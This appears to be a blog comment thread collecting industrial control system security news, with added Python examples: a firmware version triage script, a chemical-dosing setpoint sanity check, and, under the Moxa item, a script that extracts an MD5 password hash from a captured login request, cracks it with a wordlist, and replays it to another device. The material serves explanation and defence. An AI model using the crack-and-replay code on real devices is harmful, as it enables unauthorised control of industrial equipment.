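    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 16
    + b"GNU bash, version 2.05b.0(1)-release\x00"
    + b"\x90\x90\x90"
    + b"OpenSSL 1.0.0e 6 Sep 2011\x00"
    + b"\xff" * 8
    + b"SSH-2.0-dropbear_2012.55\x00"
)


def version_key(version: str) -> Tuple[Tuple[int, ...], str]:
    """'1.0.0e' -> ((1, 0, 0), 'e'); '2.05b' -> ((2, 5), 'b'). Tuples compare
    numerically first, then by the letter suffix, so 1.0.1f < 1.0.1g."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)([a-z]?)", version)
    if not m:
        raise ValueError("unparsable version: %r" % version)
    return tuple(int(x) for x in m.group(1).split(".")), m.group(2)


def extract_components(blob: bytes) -> Dict[str, str]:
    """Return {component: version} for every banner found in the blob."""
    found = {}
    for name, pattern in BANNER_PATTERNS.items():
        m = re.search(pattern, blob)
        if m:
            found[name] = m.group(1).decode("ascii")
    return found


def triage(blob: bytes, policy: Dict[str, str]) -> Tuple[List[Tuple[str, str, str]], Dict[str, str]]:
    """Split findings into (component, found, minimum) triples that violate the
    policy, and components with no policy entry that need a manual look."""
    violations, unreviewed = [], {}
    for name, version in extract_components(blob).items():
        minimum = policy.get(name)
        if minimum is None:
            unreviewed[name] = version
        elif version_key(version) < version_key(minimum):
            violations.append((name, version, minimum))
    return violations, unreviewed


if __name__ == "__main__":
    bad, unknown = triage(SAMPLE_FIRMWARE, EXAMPLE_POLICY)
    for name, found, minimum in bad:
        print(f"OUTDATED {name} {found} (policy minimum {minimum})")
    for name, found in unknown.items():
        print(f"REVIEW   {name} {found} (no policy entry)")
```

On a real image, run this over the extracted root filesystem (for example after unpacking with binwalk) rather than the packed download, since compressed sections hide the banners; and treat a component with no policy entry as a finding in its own right, because the article's point is precisely that nobody had looked.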

  17. Tomi Engdahl says:

    Rockwell Patches Serious ‘FrostyURL’ PLC Vulnerability

    Rockwell Automation has patched a handful of vulnerabilities in its Allen-Bradley MicroLogix programmable logic controllers, including one that researchers say can be exploited with a single malicious URL.

    The so-called FrostyURL vulnerability affects the Allen-Bradley MicroLogix 1100 PLC used to control industrial processes in a number of critical industries. CyberX, a security vendor operating in the industrial control system and SCADA markets, said that a single click of a maliciously crafted URL could affect an operational network.

    “It blew our minds how simple it is,” said Nir Giller, CyberX CTO.

“This was an ‘Open-Sesame’ moment, as it enabled us to dump all of the PLC’s memory and thus observe the effects of different exploitation techniques we tried later on,” said researcher David Atch. “We successfully reverse engineered the PLC firmware, and we are sure we can find and exploit additional vulnerabilities.”

  18. Tomi Engdahl says:

    Iranian hackers ‘targeted’ New York dam

    Iranian hackers penetrated the computers controlling a dam near New York, reveals the Wall Street Journal.

    The 2013 attack did no damage but revealed information about how computers running the flood control system worked, said the paper.

    Hackers working for nation states regularly hit national infrastructure targets, said a separate AP report.

    About 12 times in the last decade hackers have won high-level access to power networks, it said.

    Detailed plans

    Extensive information about the Bowman Avenue dam in Rye, New York state was taken by the hackers, experts familiar with the incident told the newspaper.

An investigation pointed to Iran as the likely source of the attack and alerted US authorities to the significant cyber warfare capabilities of that nation, said the report. The same group of hackers that attacked Bowman Avenue was also implicated in separate attacks on three US financial firms, it added.

    The US power network has also come under regular attack by “sophisticated foreign hackers” said AP in an extensive investigation.

    Many times security researchers had found evidence that hackers had won access to these sensitive systems. So far, all the attacks seemed intent on gathering detailed information, including engineering drawings, about networks and facilities.

    One extensive campaign gave hackers access to 82 separate plants spread across the US and Canada.

The knowledge accumulated by the attackers has not been used to shut down the power plants or change the way they work.

    Hackers could get at the power plants and other parts of national infrastructure because many of the systems were set up long before the need to protect them against remote attacks became apparent.

  19. Tomi Engdahl says:

    Microsoft Windows XP Embedded ends extended support
    Ask Control Engineering: Extended support for Microsoft Windows XP Embedded has ended; what should I do?

Ask Control Engineering: Since Microsoft has ended extended support for Microsoft Windows XP Embedded as of Jan. 12, what should I do, if anything?

Answer: Since Microsoft is no longer offering support for its 15-year-old operating system, Microsoft Windows XP Embedded, those who have procrastinated now have additional concerns and risks to address.

    “What’s worse,” said one manufacturing IT expert, “is to not even know if you have any XP systems running.”

Brandl warns that users still running Microsoft Windows XP Embedded systems in their facilities face several additional security risks. Finding compatible software will be very difficult, and this, in turn, will make the systems more vulnerable to cyber security attacks. Brandl explains that running a complete system inventory will at least make it clear whether there is a potential support problem.

    The long goodbye to Microsoft Windows XP Embedded

    There are those that get work done early, those that get it done on time, and those that procrastinate until every task is an emergency. Those still using Microsoft Windows XP Embedded in their industrial environments will fall into the latter category because Microsoft’s extended support for Windows XP Embedded ends on January 12, 2016. The 15-year-old operating system will no longer be supported or updated, no matter how much users clamor or beg.

    Companies still using Microsoft Windows XP Embedded systems in their facilities will be running into several additional risks. For example, it will be difficult to find compatible hardware and software, and it will be difficult, if not impossible, to get updates to the applications currently running, which will make the systems more vulnerable. If there are Microsoft Windows XP systems running and they can’t be replaced, then take measures to reduce potential risks. What is worse is to not even know if you have any XP systems running.

It is vital to complete a software and IT hardware inventory of the entire facility, which includes far more than just the production systems. It is important to also consider your laboratory systems, maintenance systems, warehouse systems, tank farm systems, HVAC systems, physical security systems, document management systems, planning systems, and development systems. Without a complete inventory, “hidden” systems under employees’ desks, which are performing critical functions, might go unnoticed. For example, is the scheduling department still using an XP-based tool, or worse, a DOS-based tool; is the laboratory using XP-based test equipment; are the automated material movement systems running XP-based configuration and maintenance software; or is the security department using an XP-based badge scanning system?

    At the very minimum, a complete system inventory will make it clear if there’s a potential support problem.

    The worst situation is to have high risk and obsolete systems where there are no readily available replacements.

    In these situations, the first step is to virtualize the hardware, which at least removes the risk of a hardware failure and provides backups in case of software failures. Second, the systems should be isolated from other networks through demilitarized zones (DMZs), firewalls, or physical separation. It is likely the Microsoft Windows XP system will be running vulnerable browsers, databases, applications, and drivers, which makes isolation even more vital. However, virtualization and isolation are only temporary fixes to give the manager time to implement long-term solutions.

    For machines that cannot be upgraded, what needs to change now that Microsoft Windows XP support has ended?
    Ask Control Engineering sought advice from industrial software developers related to the end of Microsoft Windows XP support. Here, Beckhoff Automation provides answers related to Microsoft Windows XP obsolescence.

    Ask Control Engineering: For manufacturers that may not be able to upgrade certain machines or systems past Microsoft Windows XP, what should change now that Microsoft Windows XP support has ended? Answers for related questions below are provided by Debra Lee, software specialist, Beckhoff Automation.

    A. Now that support from Microsoft for Windows XP has ended, machines with this operating system (OS) will no longer be able to get OS updates, including security updates. Naturally, best practices dictate that machines be kept up to date with the latest security updates. However, most of these machines are not connected to the Internet, and those that are generally are not used for surfing the Internet nor do they open files or attachments in software applications such as e-mail, both of which are notorious for the spread of viruses and malware. It is important to note as well that many machines are actually running Windows XP Embedded. Support for Windows XP Embedded is still active and does not end until Jan. 12, 2016.

    Q. If customers cannot upgrade, what should change, if anything, on April 9?

    A. If a security audit finds that access to the machine is secured and there is no Internet connectivity or e-mail “read” access with file download capability on the machine, nothing necessarily needs to change today even if a machine has devices with Windows XP OS on it. If the security audit finds a potential hazard in these areas, however, action may need to be taken to remove the access points, or if that is not possible for some reason, upgrade the device(s) on the machine. Of course, users should remember that Windows XP Embedded support is still active and will continue to be active until the beginning of 2016.

  20. Tomi Engdahl says:

Security flaw in Advantech gateway left industrial equipment open – any password grants access

A programming mistake by the manufacturer left Advantech gateways, which are embedded into industrial devices, open to anyone. Advantech TCP/IP gateways allow industrial equipment with serial ports to be connected to the Internet for remote management.

Advantech last updated the devices’ firmware last fall and removed the gateways’ hard-coded SSH server password. However, the update did not fix an even bigger problem: the modified SSH server accepted any password.

The problem was found by researchers at Rapid7. The vulnerability is in firmware version 1.98 for the Advantech EKI-1322 gateway, published in the autumn. The most recent version, 2.00, published at the end of December, corrects the problem.

Rapid7 says that the problem arose because the SSH server, called Dropbear, had been modified so much that it no longer actually required user authentication.


  21. Tomi Engdahl says:

    The effects of a hacked power grid

Oil and gas, water and electric power rely on SCADA (supervisory control and data acquisition), protection, and monitoring systems that use communications networks. The use of communications networks makes these systems potentially vulnerable to cyberattack.

A recent power blackout in Ukraine affected about 1.4 million people; the attack used an espionage Trojan known as BlackEnergy. The attack looks to be the first time that malware has been used to create a large-scale power disruption.

    The power grid failure took down nearly a quarter of the country’s power for several hours. This type of cyber threat is now becoming more of a reality as power delivery and technology continue to merge.

    Today, utilities are faced with a confusing array of cybersecurity guidance, standards, and regulatory requirements.

    Keeping The Lights On — And Hackers From Crossing The Power Lines

    The electric grid in the United States suffers from multiple issues, including inefficiency and high cost. Smart technologies have been touted to solve these and other operational difficulties. Yet, a shift can bring its own problems as well. Mixing power delivery with digital technologies opens up the possibility of disruptions caused by malicious entities. This threat must be seriously considered and mitigated with a carefully crafted strategy.

  22. Tomi Engdahl says:

    The long goodbye to Microsoft Windows XP Embedded

    Microsoft’s extended support for Windows XP Embedded ends on January 12, 2016, and those using the system after the expiration date need to take stock of their situation with a complete system inventory to assess the systems’ support availability and where upgrades are really needed.

    There are those that get work done early, those that get it done on time, and those that procrastinate until every task is an emergency. Those still using Microsoft Windows XP Embedded in their industrial environments will fall into the latter category because Microsoft’s extended support for Windows XP Embedded ends on January 12, 2016. The 15-year-old operating system will no longer be supported or updated, no matter how much users clamor or beg.

    Companies still using Microsoft Windows XP Embedded systems in their facilities will be running into several additional risks. For example, it will be difficult to find compatible hardware and software, and it will be difficult, if not impossible, to get updates to the applications currently running, which will make the systems more vulnerable. If there are Microsoft Windows XP systems running and they can’t be replaced, then take measures to reduce potential risks. What is worse is to not even know if you have any XP systems running.

  23. Tomi Engdahl says:

    BlackEnergy malware activity spiked in runup to Ukraine power grid takedown
    But its role in the attack remains unclear

    Fresh research has shed new light on the devious and unprecedented cyber-attack against Ukraine’s power grid in December 2015.

    A former intelligence analyst has warned that launching similar attacks is within the capabilities of criminals, or perhaps even hacktivist groups, since most of the key components are readily available online.

    Zach Flom, an intelligence analyst at threat intelligence firm Recorded Future and a former US DoD computer network defense analyst, has published a study on the BlackEnergy malware, noting a spike in activity prior to the Ukraine attack that left more than 200,000 people temporarily without power on December 23.

    “In 2014, shortly after being picked up by APT [advanced persistent threat] groups and becoming more modular, we see a large spike in references to the malware and its increasing usage in European countries, namely Ukraine,” Flom notes.

    BlackEnergy has evolved from a “relatively simple” distributed denial-of-service attack tool of early 2007 to a highly capable blob of malware over the last eight years, according to Flom.

    The warning of potential future misuse of BlackEnergy comes days after a US government report concluded that the December 2015 power outage in Ukraine – which affected 225,000 customers – was caused by outside attackers.

    Representatives of the US Department of Homeland Security (DHS), Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) and other US government agencies traveled to Ukraine to collaborate and gain more insight into the attack.

    “The cyber-attack was reportedly synchronized and coordinated, probably following extensive reconnaissance of the victim networks. According to company personnel, the cyber-attacks at each company occurred within 30 minutes of each other and impacted multiple central and regional facilities. During the cyber-attacks, malicious remote operation of the breakers was conducted by multiple external humans using either existing remote administration tools at the operating system level or remote industrial control system (ICS) client software via virtual private network (VPN) connections. The companies believe that the actors acquired legitimate credentials prior to the cyber-attack to facilitate remote access.

    All three companies indicated that the actors wiped some systems by executing the KillDisk malware at the conclusion of the cyber-attack. The KillDisk malware erases selected files on target systems and corrupts the master boot record, rendering systems inoperable.”

    Malware ‘clearly’ behind Ukraine power outage, SANS utility expert says
    Mounting evidence attacks are handiwork of elite Russian hacker team.

  24. Tomi Engdahl says:

    Kim Zetter / Wired:
    Inside the Cunning, Unprecedented Hack of Ukraine’s Power Grid — It was 3:30 p.m. last December 23, and residents of the Ivano-Frankivsk region of Western Ukraine were preparing to end their workday and head home through the cold winter streets. Inside the Prykarpattyaoblenergo control center …

    Inside the Cunning, Unprecedented Hack of Ukraine’s Power Grid

    A Brilliant Plan

    The hackers who struck the power centers in Ukraine—the first confirmed hack to take down a power grid—weren’t opportunists who just happened upon the networks and launched an attack to test their abilities; according to new details from an extensive investigation into the hack, they were skilled and stealthy strategists who carefully planned their assault over many months, first doing reconnaissance to study the networks and siphon operator credentials, then launching a synchronized assault in a well-choreographed dance.

    “It was brilliant,” says Robert M. Lee, who assisted in the investigation. Lee is a former cyber warfare operations officer for the US Air Force and is co-founder of Dragos Security, a critical infrastructure security company. “In terms of sophistication, most people always [focus on the] malware [that’s used in an attack],” he says. “To me what makes sophistication is logistics and planning and operations and … what’s going on during the length of it. And this was highly sophisticated.”

    Ukraine was quick to point the finger at Russia for the assault. Lee shies away from attributing it to any actor but says there are clear delineations between the various phases of the operation that suggest different levels of actors worked on different parts of the assault. This raises the possibility that the attack might have involved collaboration between completely different parties—possibly cybercriminals and nation-state actors.

    “This had to be a well-funded, well-trained team. … [B]ut it didn’t have to be a nation-state,”

    Regardless, the successful assault holds many lessons for power generation plants and distribution centers here in the US, experts say; the control systems in Ukraine were surprisingly more secure than some in the US, since they were well-segmented from the control center business networks with robust firewalls. But in the end they still weren’t secure enough—workers logging remotely into the SCADA network, the Supervisory Control and Data Acquisition network that controlled the grid, weren’t required to use two-factor authentication, which allowed the attackers to hijack their credentials and gain crucial access to systems that controlled the breakers.

  25. Tomi Engdahl says:

    Hackers Modify Water Treatment Parameters By Accident

    Verizon’s RISK security team has revealed details on a data breach they investigated where some hackers (previously tied to hacktivism campaigns) breached a payments application from an unnamed water treatment and supply company [PDF, page 38], and also escalated their access to reach SCADA equipment responsible for the water treatment process. The hackers modified water treatment chemical levels four different times.

    The cause of this intrusion seems to be bad network design, since all equipment was interconnected with each other in a star network design

    Of course, the hackers had no clue what they were modifying. Nobody got poisoned or sick in the end.

    Hackers Modify Water Treatment Parameters by Accident

    A group of hackers, previously involved in various hacktivism campaigns, have accidentally made their way into an ICS/SCADA system installed at a water treatment facility and have altered crucial settings that controlled the amount of chemicals used to treat tap water.

    This strange hacking incident is described in Verizon’s 2016 Data Breach Digest (page 38, Scenario 8), a collection of case studies that the company’s RISK team was brought in to investigate.

    The victim of the hack is a company that Verizon identified under the generic name of Kemuri Water Company (KWC). As the RISK team explains, the company noticed that, for a couple of weeks, its water treatment center was behaving erratically, with chemical values being modified out of the blue.

    Suspecting something was wrong – and something that its IT staff wasn’t able to spot – the company brought in Verizon’s RISK team to investigate.

First off, KWC was using extremely outdated computer systems, some of which were running ten-year-old operating systems.

Additionally, the entire IT network revolved around a single piece of equipment, an AS400 system, which interconnected the company’s internal IT network and the SCADA systems that managed the water treatment facility (a big no-no in terms of security).

    Even worse, the same AS400 was also exposed to the Internet because it was routing traffic to a Web server where KWC’s customers could check their monthly water bill, their current water consumption level, and even pay bills via a dedicated payments application.

    RISK team discovered that the hackers first breached the system via the Web-accessible payments application, looking for sensitive information about the company’s clients.

    Curious as they were, the hackers accessed the AS400 system, from where they also ended up on the SCADA system and started modifying parameters at random, unknowingly changing water treatment values.

    Secondary security measures allowed KWC to detect abnormalities in the levels of released chemicals, and aborted the hackers’ instructions, but this happened often enough to arouse suspicions that this had to be more than a glitch.

    Data breach digest.
    Scenarios from the field
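What saved KWC was not the network design but the "secondary security measures" that noticed chemical levels moving in ways that made no process sense and aborted the writes. The block below is an added example of that kind of independent plausibility check, written for this page rather than taken from Verizon's report or from KWC: it judges each dosing setpoint write against engineering limits, a maximum per-write step, and a list of hosts that are allowed to write at all, and refuses to advance the baseline for a write it rejects. The tags, limits, hostnames and the sample write sequence are constructed for illustration.

```python
"""Added example: an independent plausibility check on chemical-dosing
setpoint writes, the kind of 'secondary measure' that let KWC catch writes
that made no process sense. Tags, limits, sources and the sample writes are
constructed for illustration; they are not KWC's values."""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class SetpointWrite:
    ts: int        # epoch seconds
    tag: str
    value: float
    source: str    # host that issued the write


# Constructed engineering limits per tag: (low, high, max change per write).
LIMITS: Dict[str, Tuple[float, float, float]] = {
    "CL2_DOSE_PPM":  (0.5, 4.0, 0.5),
    "NAOH_DOSE_PPM": (0.0, 25.0, 5.0),
}
# Constructed: only the operator HMI and the engineering workstation may write.
ALLOWED_SOURCES = {"HMI-01", "ENG-WS-02"}


def check_writes(writes: List[SetpointWrite], limits=LIMITS, allowed=ALLOWED_SOURCES,
                 baseline: Dict[str, float] = None):
    """Return (alerts, accepted) where alerts is a list of (write, reasons).
    A rejected write does not advance the per-tag baseline, mirroring a
    system that refuses to apply it."""
    last = dict(baseline or {})
    alerts, accepted = [], []
    for w in writes:
        reasons = []
        if w.source not in allowed:
            reasons.append("source not an authorised writer")
        if w.tag not in limits:
            reasons.append("unknown tag")
        else:
            lo, hi, max_step = limits[w.tag]
            if not lo <= w.value <= hi:
                reasons.append(f"outside engineering range {lo}-{hi}")
            prev = last.get(w.tag)
            if prev is not None and abs(w.value - prev) > max_step:
                reasons.append(f"step {abs(w.value - prev):.2f} exceeds {max_step}")
        if reasons:
            alerts.append((w, reasons))
        else:
            last[w.tag] = w.value
            accepted.append(w)
    return alerts, accepted


# Constructed sequence: two normal operator writes, then writes arriving via
# the billing-side gateway path that should never touch the process.
SAMPLE_WRITES = [
    SetpointWrite(1_000, "CL2_DOSE_PPM", 2.0, "HMI-01"),
    SetpointWrite(1_600, "CL2_DOSE_PPM", 2.3, "HMI-01"),
    SetpointWrite(1_900, "CL2_DOSE_PPM", 3.9, "AS400-GW"),    # wrong source, big jump
    SetpointWrite(2_100, "NAOH_DOSE_PPM", 40.0, "AS400-GW"),  # wrong source, out of range
    SetpointWrite(2_400, "NAOH_DOSE_PPM", 12.0, "ENG-WS-02"),
]


if __name__ == "__main__":
    alerts, ok = check_writes(SAMPLE_WRITES)
    for w, why in alerts:
        print(f"REJECT t={w.ts} {w.tag}={w.value} from {w.source}: {'; '.join(why)}")
    print(f"{len(ok)} writes accepted")
```

The value of a check like this is that it does not depend on knowing the attacker's intent: KWC's intruders changed values "at random", and random values fail range and step limits just as reliably as deliberate ones. The rejections should also be logged and counted, since in the KWC case it was the frequency of the anomalies, not any single one, that turned "a glitch" into an investigation.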

  26. Tomi Engdahl says:

    Catalin Cimpanu / Softpedia News:
    Verizon study highlights how bad network design, outdated systems, and old operating systems exposed a water treatment plant to inadvertent hacking

    Hackers Modify Water Treatment Parameters by Accident

    A group of hackers, previously involved in various hacktivism campaigns, have accidentally made their way into an ICS/SCADA system installed at a water treatment facility and have altered crucial settings that controlled the amount of chemicals used to treat tap water.

    This strange hacking incident is described in Verizon’s 2016 Data Breach Digest (page 38, Scenario 8), a collection of case studies that the company’s RISK team was brought in to investigate.

    The victim of the hack is a company that Verizon identified under the generic name of Kemuri Water Company (KWC). As the RISK team explains, the company noticed that, for a couple of weeks, its water treatment center was behaving erratically, with chemical values being modified out of the blue.

  27. Tomi Engdahl says:

    Vulnerabilities Found in Siemens SIPROTEC Protection Relays

    Researchers discovered that Siemens’ SIPROTEC protection relays are plagued by a couple of medium severity information disclosure vulnerabilities. Firmware updates have been released by the vendor for some of the affected products.

    The security holes affect SIPROTEC 4 and SIPROTEC Compact devices, which provide protection, control, measurement and automation functions for electrical substations and other applications. The products are deployed worldwide in the energy and other sectors.

    According to advisories published this week by Siemens and ICS-CERT, the integrated web server of the vulnerable products allows an attacker with access to the network to obtain sensitive device information (CVE-2016-4784).

    This flaw affects the EN100 Ethernet modules found in SIPROTEC 4 and SIPROTEC Compact devices, and the Ethernet service interface on Port A of several SIPROTEC Compact models.

    The second vulnerability, which affects only EN100 Ethernet modules, allows an attacker on the network to access a portion of the device’s memory content (CVE-2016-4785). This issue is also related to the integrated web interface.

    ICS-CERT noted that even a low-skilled attacker can exploit the vulnerabilities as long as they can gain access to the network hosting the devices.

    Versions 4.26 and earlier of the firmware running on EN100 Ethernet modules are affected by the vulnerabilities. Siemens has plugged the security holes by updating the firmware to version 4.27.

    This is the second advisory published by ICS-CERT for Siemens SIPROTEC products.

  28. Tomi Engdahl says:

    Vulnerabilities Found in Siemens Power Automation System

    Researchers have discovered two vulnerabilities in Siemens’ SICAM Power Automation System (PAS). The vendor has patched one of the flaws and is currently working on addressing the other one.

    SICAM PAS is an automation system used by energy companies worldwide to operate electrical substations. The Windows-based software product is advertised as scalable, flexible, easy to operate and cost-efficient.

    Researchers at Positive Technologies analyzed the Siemens product and found that it’s plagued by two information disclosure vulnerabilities that can be exploited by a local attacker, ICS-CERT said in an advisory published on Thursday.

    Experts discovered that user passwords are not protected properly, allowing an attacker to reconstruct the information (CVE-2016-5848). The second issue can be exploited by hackers to access sensitive configuration data (CVE-2016-5849).

  29. Tomi Engdahl says:

    Flaws Found in Moxa Factory Automation Products

    Applied Risk, a company that specializes in protecting industrial control systems (ICS), published an advisory this week describing several vulnerabilities found in one of Moxa’s factory automation products.

    The security firm’s researchers have identified various types of flaws in the web interface of Moxa’s ioLogik Ethernet I/O products, which are used in oil and gas, manufacturing, nuclear, and water plants.

    The most serious of the vulnerabilities are related to password management. Experts discovered that an MD5 hash of the password used for authentication is sent to the server in a GET request. Since the information is transmitted over HTTP instead of HTTPS, a man-in-the-middle (MitM) attacker can easily obtain and crack the password.

    “The discovered vulnerabilities can be exploited remotely, but there are some prerequisites to be met. Being in the same network as the devices would make exploitation trivial but it’s not much harder to exploit the vulnerabilities remotely,” Ariciu explained. “It depends on the type of access the attacker has – normally the entry point in a network is not the device that sits in the field.”

    The issues were reported to Moxa on May 26 and they were addressed in ioLogik E1242 on September 30 with the release of firmware version 2.5.
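To make the password-management finding concrete: an unsalted MD5 of the password in a cleartext GET gives a passive observer on the plant LAN two options, cracking the hash offline against a wordlist, or simply replaying the request, because the hash itself is the credential the device accepts. The block below is an added example written for this page, not Applied Risk's proof of concept or Moxa code. The captured request, the host address, the wordlist and the query parameter names are all constructed; the real form field names are not given in the article.

```python
"""Added example: what the Moxa weakness hands an attacker on the LAN. An
unsalted MD5 of the password travels in a cleartext GET, so a passive
observer can (a) crack it offline with a wordlist and (b) replay it as-is,
since the hash itself is the credential. The request, host, wordlist and the
parameter names are constructed; the real form field names are not given above."""
import hashlib
import re
from typing import Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed capture of the login request. The 'pw' value is md5("Welcome1"),
# computed here so the sample stays honest about what it contains.
CAPTURED_REQUEST = (
    "GET /login.cgi?user=admin&pw=" + hashlib.md5(b"Welcome1").hexdigest()
    + " HTTP/1.1\r\nHost: 192.168.127.254\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
)

# Constructed wordlist; a real crack would use a large dictionary plus rules.
WORDLIST = ["password", "admin", "moxa", "123456", "Welcome1", "letmein"]

HEX32 = re.compile(r"[0-9a-fA-F]{32}")


def extract_md5_from_request(raw: str) -> Optional[Tuple[str, str]]:
    """Find a 32-hex-char query parameter in the request line and return
    (parameter name, hash). Only the request line is parsed; headers are ignored."""
    request_line = raw.split("\r\n", 1)[0]
    method, target, _version = request_line.split(" ")
    if method != "GET":
        return None
    for key, values in parse_qs(urlsplit(target).query).items():
        for v in values:
            if HEX32.fullmatch(v):
                return key, v.lower()
    return None


def crack_md5(hexdigest: str, wordlist) -> Optional[str]:
    """Unsalted MD5: one hash per candidate, no per-user salt to slow this down."""
    target = hexdigest.lower()
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == target:
            return candidate
    return None


def replay_request(raw: str, new_host: str) -> str:
    """The hash is the credential: rewriting only the Host header is enough to
    resend the same login to another unit, with no cracking at all."""
    return re.sub(r"(?m)^Host: [^\r\n]*", "Host: " + new_host, raw, count=1)


if __name__ == "__main__":
    param, digest = extract_md5_from_request(CAPTURED_REQUEST)
    print(f"hash in parameter {param!r}: {digest}")
    print("cracked:", crack_md5(digest, WORDLIST))
    print(replay_request(CAPTURED_REQUEST, "192.168.127.253").split("\r\n")[1])
```

Hashing on the client changes nothing here: the device compares the hash, so the hash is what must be protected, and only transport encryption (HTTPS) or a server-issued, single-use challenge mixed into the hash removes both the offline crack and the replay.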

  30. Tomi Engdahl says:

    Know the risks of securing safety systems

    Even if a safety system is isolated and separate from a network, the potential for a cyber attack remains and companies and users need to be vigilant and take necessary precautions.

    One assumption about safety systems is they need to remain isolated from the control system, ensuring nothing will hinder their mission to keep the plant and workers safe.

    If we have learned anything in this cyber-aware world, isolation is not security. That means no matter if safety is separate, integrated or interfaced, there is always a path in.

    In these days of working in open, connected manufacturing enterprises, security threats hover over a facility like a looming blizzard, potentially undercutting the vast ability connected plants have to reduce cost and increase productivity and profitability. Control systems, and just as importantly, the safety system, need to stay secure.

    That means the manufacturer needs to treat its safety systems like any other in a facility and conduct a risk assessment to understand any and all strengths and weaknesses.

    “The risk-assessment process is the same as with a control system in that you have to identify the system and how it interfaces with the rest of the system, which is pretty critical,” said John Cusimano, director of industrial cybersecurity at aeSolutions. “Generally speaking, it is always best practice to treat the safety systems as its own zone and then you perform a risk assessment on that safety zone.”

    While the process control system and the safety system have similarities, there is one major distinction.

    “The biggest difference with a safety system is the consequences,” Cusimano said. “When you do the risk assessment in the safety system zone it comes out at a higher risk, it will change your protection and your decisions on how you are going to secure that zone. It will be a higher level of security and require stronger mitigations. Generally, you are trying to minimize the communications and reduce the attack surface.”

    Safety systems remain a vital cog not just in keeping the plant and people safe, but also enabling successful business performance.

“The biggest thing users are coming to realize is the attack will most likely come from inside the network than outside,” said Sven Grone, industrial automation turbomachinery control business development at Schneider Electric. “Things like inadvertent viruses on flash drives, contractors coming in with their machines and hooking up to the network to work on gear. These are people you invited into your systems to work on it and you are not controlling their machines and not controlling what they are putting on the network. There is definitely an element of social engineering and having to deal with people’s behavior and operational behavior in the cybersecurity process that is often not nearly as prevalent as in doing functional safety.”

    Security whether separate or integrated

    When it comes to securing a safety system, the age-old question of integrated or separate systems continues to rear its ugly head.

“I am a personal believer in a separate system. The little amount of money you save making it integrated is just the engineering portion of it,” said Nasir Mundh, global director of safety services at Schneider Electric.

    No matter the type of system, vigilance remains the key priority.

    “Integrated, interfaced, or separate. There is no right, no wrong, only choice,”

    “We integrate safety and now security becomes an issue—we are seeing a movement back to maintaining as much distance between the control system and safety as possible,” Elliott said. “Thinking about moving toward open standards and connecting everything together, next security is a consideration—solving one problem, creates another.”

  31. Tomi Engdahl says:

    Preparing for a cyber attack
    An incident response (IR) plan is a vital component of cybersecurity strategy.

    What was once an afterthought for oil and gas organizations, cybersecurity is now center stage. Cybersecurity impacts every facet of oil and gas operations, which are now more digital and connected than ever. As such, chief information security officers (CISO) understand that attacks are inevitable, and what counts today is how organizations respond to threats and their overall level of cyber-readiness.

    Cybersecurity has similar traits to physical security. Many people have an alarm system in their house, not to prevent a break-in from occurring, but to immediately alert the house’s occupants, and authorities, when one happens. Further, while everything in a home may have value, the most valuable items are frequently stored in a safe for added protection.

    Organizations are beginning to think about cybersecurity in the same way. As threats become more sophisticated, companies must acknowledge that attacks can’t necessarily be prevented, but fast response time and a secure environment for the most critical data and assets are key to building a strong cybersecurity position.

    Cybersecurity attacks on energy organizations are more targeted than other industries, causing costly damage to operational technology (OT) environments. With an increasing number of connected devices and two very unique operating environments—IT and OT—the oil and gas sector’s greatest challenge is to establish clear and informative guidelines for people and processes during a cyber attack.

    Despite having an incident response (IR) plan in place, very few oil and gas organizations run through full simulation exercises of this plan. Simulated exercises can reveal incorrect assumptions made during the IR process and also alert security leaders to gaping holes

  32. Tomi Engdahl says:

    Nuclear Power Plant Disrupted by Cyber Attack

    The head of an international nuclear energy consortium said this week that a cyber attack caused a “disruption” at a nuclear power plant at some point during the last several years. Yukiya Amano, the head of the International Atomic Energy Agency (IAEA) didn’t go into detail about the attack, but warned about the potential of future attacks, stressing on Monday that the idea of cyber attacks that impact nuclear infrastructure isn’t an “imaginary risk.”

    “This issue of cyber attacks on nuclear-related facilities or activities should be taken very seriously. We never know if we know everything, or if it’s the tip of the iceberg,” Amano told reporters in Germany.

    It’s unclear whether Amano will ever disclose which power plant was affected, or when the attack happened. He told Reuters it occurred “two to three years ago,” and declined to get further into the incident, which was previously unknown.

    “It could be ransomware, malware, a targeted attack; it’s anyone’s guess what it could be,”

  33. Tomi Engdahl says:

    Schneider Electric plugs gaping hole in industrial control kit
    Provider Schneider would’ve had hackers inside ‘er

    A vulnerability in Schneider Electric’s industrial controller management software created a possible mechanism for hackers to plant malicious code on industrial networks.

    Industrial cybersecurity firm Indegy discovered the recently resolved flaw in Schneider Electric’s flagship industrial controller management software, Unity Pro. “The vulnerability in Unity Pro allows any user to remotely execute code directly on any computer on which this product is installed, in debug privileges,” Indegy warned in an advisory.

    “It is good that cybersecurity companies are disclosing these vulnerabilities and following good ethical disclosure practices, but no one should be surprised that such vulnerabilities exist,” Zahn said. “This is tip of the iceberg stuff as most control systems in the field today were designed without cybersecurity as even a consideration.”

    New SCADA Vulnerability Enables Remote Control of ICS Networks

    As part of our ongoing R&D efforts we occasionally discover vulnerabilities in industrial controllers (PLCs, RTUs, DCS etc.) and software tools. Recently, Indegy Labs team discovered a vulnerability in Unity Pro, Schneider Electric’s flagship software application for managing and programming industrial controllers. Before we get into the specifics, it’s important to point out that unlike in IT networks, a vulnerability is not necessarily required to compromise controllers in an ICS network. That’s because:

    Industrial controllers lack authentication
    Industrial communication protocols lack encryption

    Surprising as it might sound, anyone who has access to the control network also has unfettered access to all of its industrial controllers. This means that anyone who can ping a controller can probably send it a stop command or reprogram the device to cause operational disruptions.

    Nonetheless, some vulnerabilities can pose exceptional risk to ICS networks.

    The vulnerability in Unity Pro allows any user to remotely execute code directly on any computer on which this product is installed, in debug privileges. The vulnerable software tool is present in every control network in the world that uses Schneider-Electric controllers. Regardless of the SCADA/DCS applications in use, if Schneider Electric controllers are deployed, this software will be used on the engineering workstations. This makes this attack relevant across virtually any process controlled by these PLCs. Since Schneider Electric is one of the largest industrial control equipment providers, this vulnerability is a major concern.

    Our Recommendations

